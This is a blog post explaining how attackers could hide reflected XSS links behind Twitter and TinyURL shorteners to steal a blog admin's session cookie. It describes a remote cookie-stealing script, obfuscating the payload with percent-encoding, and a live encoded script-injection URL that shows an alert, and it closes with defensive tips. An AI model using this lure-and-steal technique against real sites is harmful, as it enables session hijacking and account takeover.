Twitter has taken the social networking crowd by storm. Apparently originally used for friends to send small status notifications (tweets) to each other, it has now become a major avenue for businesses, internet marketers and bloggers alike drive traffic to their sites and goals. However Twitter also presents an interesting vector for malicious hackers to present Cross Site Scripting (XSS) attacks to their targets.
Recently a mate of mine was showing me an application (www.twitterfeed.com) that automatically tweets your blog feeds. He sent me to one of his many twitter feeds to show me how it works. Now I am not exactly what you would call a twitter fan and as a result I haven’t spent much time on the site. The first thing that struck me was that the page was completely full of short URL alias’s also known as TinyURL’s amongst other names (I’ll refer to them as TinyURL’s from here on in).
Naturally, my spidey senses started tingling….
Before we go on, let’s look at the information the attacker has on their potential target already;
- The twitter feed is updated through a blog or forum of which the tweeter is probably the admin.
- The admin has probably logged on recently and quite possibly has a current session key.
- We can make the assumption that the admin is desensitized to seeing TinyURL’s and clicking them and/or doesn’t realise the dangers.
The stage is set…
The attacker has located an XSS vulnerability on the targets favourite blog/forum software application but what can he do with it? Well He might use this vulnerability to many things, including; Cookie stealing, targeted site defacement or he might call on his own malicious JavaScript.
Now he needs to create his malicious payload. Let’s say that the malicious hacker has setup a website that captures any cookies passed to it through a malicious JavaScript file called cookiestealer.js.
He creates a URL like the one below and uses it in a response tweet to the target. This is an attempt to coax the target into clicking through. As you can see, he takes advantage of the XSS vulnerability by calling the attackers nasty cookiestealer.js script from within the legitimate www.yoursite.com request.
http://www.yoursite.com/members.php?
So would you click this link?
You may or may not, but the chances are against the attacker at this stage.
So maybe he attempts to obfuscate it like this? ? Note: this URL is a live XSS example. Using this link will display an alert popup using code that was not coded into the website.
http://www.damiangrace.com/xss.php?xss=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%54%77%69%74%74%65%72%20%69%73%20%44%61%6E%67%65%72%6F%75%73%21%21%21%20%57%65%20%63%6F%75%6C%64%20%68%61%76%65%20%6A%75%73%74%20%73%74%6F%6C%65%6E%20%79%6F%75%72%20%63%6F%6F%6B%69%65%73%20%61%6E%64%20%6D%6F%72%65%2E%20%4C%65%61%72%6E%20%6D%6F%72%65%20%61%74%20%68%74%74%70%3A%2F%2F%77%77%77%2E%64%61%6D%69%61%6E%67%72%61%63%65%2E%63%6F%6D%2F%22%29%3C%2F%73%63%72%69%70%74%3E
So the victim is much more likely to click on this link, right? However it still does look a little strange. But what if the attacker was to make it look exactly like a twitter link? Something like this maybe:
http://tinyurl.com/l3tjkv
Do you think they will click on it now? My guess is yes!
Now the user/admin clicks on the link and the attacker is automatically fed the target cookies and can now control the target website with the same permission levels.
Scary huh???
So now that you know about it… How can you stop being a victim?
- Well, don’t go clicking on TinyURL’s all willy-nilly.
- Utilize the ‘preview’ features of the TinyURL sites. Example: http://tinyurl.com/preview.php?enable=1
- Log out of sites that require sign-on when you are finished (Closing the browser does not have the same effect).
- Don’t allow the browser to auto-login to sites.
- Upgrade to a Modern Internet Explorer version that supports XSS prevention or use Firefox with the NoScript add-on installed.
Have you experienced any strange events after clicking on a twitter link before?
